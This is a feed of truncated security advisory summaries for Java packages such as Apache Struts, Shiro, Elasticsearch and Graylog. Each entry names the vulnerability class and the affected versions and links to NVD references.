Jenkins project Jenkins AWS CodeDeploy Plugin version 1.19 and earlier contains a File and Directory Information Exposure vulnerability in AWSCodeDeployPublisher.java that can result in Disclosure of environment variables. This vulnerability appears to…
[org.graylog2:graylog2-server] Cross-site Scripting in Graylog Server
In Graylog before 2.4.6, XSS was possible in typeahead components, related to components/common/TypeAheadInput.jsx and components/search/QueryInput.ts.
References
https://nvd.nist.gov/vuln/detail/CVE-2018-14380
https://github.com/Graylog2/graylog2-ser…
[org.elasticsearch:elasticsearch] Cross-site scripting in Elasticsearch
Cross-site scripting (XSS) vulnerability in the CORS functionality in Elasticsearch before 1.4.0.Beta1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
https://nvd.nist.gov/vuln/detail/CVE-2014-6439
ht…
[org.apache.struts:struts2-core] Cross-Site Request Forgery in Apache Struts
Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.
References
https://nvd.nist.gov/vuln/detail/CVE-2014-7809
http://packetstormsecurity.com/f…
[org.apache.shiro:shiro-web] Improper Access Control in Apache Shiro
Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path.
References
https://nvd.nist.gov/vuln/detail/CVE-2016-6802
https://github.com/apache/shiro/commit/b15ab9…
[org.jboss.resteasy:resteasy-bom] JBoss RESTEasy vulnerable to Improper Input Validation
JBoss RESTEasy before version 3.1.2 could be forced into parsing a request with YamlProvider, resulting in unmarshalling of potentially untrusted data which could allow an attacker to execute arbitrary code with RESTEasy application permissions.
Refere…
[struts:struts] Cross-site Scripting
Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cook…
[org.apache.cayenne:cayenne-parent] XML External Entity Reference in Apache Cayenne
This affects Apache Cayenne 4.1.M1, 3.2.M1, 4.0.M2 to 4.0.M5, 4.0.B1, 4.0.B2, 4.0.RC1, 3.1, 3.1.1, 3.1.2. CayenneModeler is a desktop GUI tool shipped with Apache Cayenne and intended for editing Cayenne ORM models stored as XML files. If an attacker t…
[org.apache.struts:struts2-core] Arbitrary code execution in Apache Struts 2
Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
References
https://nvd…
[org.apache.struts:struts2-core] Cross-site Scripting in Apache Struts
When the Struts2 debug mode is turned on, under certain conditions an arbitrary script may be executed in the ‘Problem Report’ screen. Also if JSP files are exposed to be accessed directly it’s possible to execute an arbitrary script.
It is generally …